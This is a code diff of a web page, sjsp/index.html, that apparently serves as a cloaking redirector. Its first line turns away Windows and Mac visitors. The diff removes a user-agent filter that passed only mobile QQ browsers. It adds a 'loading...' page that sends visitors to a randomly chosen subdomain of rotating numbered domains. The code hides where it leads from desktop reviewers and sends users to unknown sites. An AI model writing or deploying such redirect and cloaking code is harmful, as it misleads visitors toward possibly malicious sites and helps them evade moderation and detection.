--- a/sjsp/index.html
+++ b/sjsp/index.html
@@ -1,28 +1,29 @@
 <script>if(/^(Win|Mac)/i.test(navigator.platform))location.href = '/404.html';</script>
-<script>
-        function leleua() {
-        var sUserAgent =navigator.userAgent.toLowerCase();
-            if(sUserAgent.indexOf('qq') > -1 ){
-                console.log('QQ');
-            }else{
-                window.location.href = "/404.html";
-            }
-        }
-        if(navigator.userAgent.indexOf('iPhone') > -1 || navigator.userAgent.indexOf('Android') > -1){
-            console.log('移动设备');
-            } else {
-            window.location.href = "/404.html";
-            }
-        leleua();
-    </script>
-<script>
+<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
+<html xmlns="http://www.w3.org/1999/xhtml">
+<head>
+    <meta charset="UTF-8">
+    <meta name="viewport" content="width=device-width, initial-scale=1.0, maximum-scale=1.0, user-scalable=no">
+<title>加载中...</title>
+</head>
 
+<body>
+<br>
+<br>
+<center><h1 style="font-size: 25px">加载中...</h1></center>
+<script>
 var urls=[
 
-	'http://{wwwnnnnnnnnn}.jzxdw.com/sjsp/?&j=&alert({nnwwnnnnnnnn}',
-	'http://{wwwnnnnnnnnn}.lvsuo110.com/sjsp/?&j=&alert({nnwwnnnnnnnn}',
-	'http://{wwwnnnnnnnnn}.hb2scxh.com/sjsp/?&j=&alert({nnwwnnnnnnnn}',
-
+	'http://{nnnn}.248tv.com/8?{nnnnnnnnnn}',
+	'http://{nnnn}.357tv.com/8?{nnnnnnnnnn}',
+	'http://{nnnn}.467tv.com/8?{nnnnnnnnnn}',
+	'http://{nnnn}.629tv.com/8?{nnnnnnnnnn}',
+	'http://{nnnn}.659tv.com/8?{nnnnnnnnnn}',
+	'http://{nnnn}.639tv.com/8?{nnnnnnnnnn}',
+	'http://{nnnn}.636kb.com/8?{nnnnnnnnnn}',
+	'http://{nnnn}.838kb.com/8?{nnnnnnnnnn}',
+	'http://{nnnn}.878kb.com/8?{nnnnnnnnnn}',
+	'http://{nnnn}.969kb.com/8?{nnnnnnnnnn}',
 
 ];
 location.href = myEeplace(urls[Math.floor(Math.random()*urls.length)]);
@@ -40,3 +41,5 @@ function myEeplace(s){
 	});
 }
 </script>
+</body>
+</html>
